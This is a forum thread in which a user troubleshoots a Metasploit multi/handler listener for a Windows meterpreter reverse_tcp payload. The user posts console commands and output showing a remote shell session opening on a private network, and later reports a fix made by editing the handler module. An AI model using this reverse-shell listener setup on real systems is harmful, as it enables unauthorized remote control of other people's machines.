.Gex. Posted October 25, 2017 Share Posted October 25, 2017 Hi Guys, I can't figure out what I am doing wrong or if there is something wrong with my Metasploit setup v4.16.7 I have created a basic reverse_tcp payload with msfvenom, when I start my listener I do the following msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.8 LHOST => 192.168.0.8 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.0.8:4444 msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.0.7 [*] Meterpreter session 1 opened (192.168.0.8:4444 -> 192.168.0.7:50298) at 2017-10-25 16:05:13 -0400 I am expecting to see a meterpreter but nothing... What's weird is I have watched a few tutorials and after typing exploit the console "waits" for the payload to be executed, once that happens the interpreter appears, but after I type exploit the console does not wait, I got straight back to msf exploit(handler) > Any help much appreciated. Quote Link to comment Share on other sites More sharing options...
Bob123 Posted October 25, 2017 Share Posted October 25, 2017 Guess I'm a bit confused. You got a connection. You just have to select it. What's the line right after your session 1 opened line? Is it just a blinking curser saying: msf exploit(handler) >? From there just select your session which would be session 1 and interact with it. Are you hoping that after typing exploit that it'll go right into the session? The above snipit shows that when you started the exploit it backgrounded it which is why you stayed in the msf console rather than jumping right into a meterpreter session. Did you type something before hand to force it to background? Does this happen every time you run this now? Quote Link to comment Share on other sites More sharing options...
.Gex. Posted October 26, 2017 Author Share Posted October 26, 2017 This seems to have happened after I updated metasploit, I want the meterpreter to show as soon as the connection from the Target is made. I changed the below which resolved the problem. edit modules/exploits/multi/handler.rb to remove 'Stance' => Msf::Exploit::Stance::Passive Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.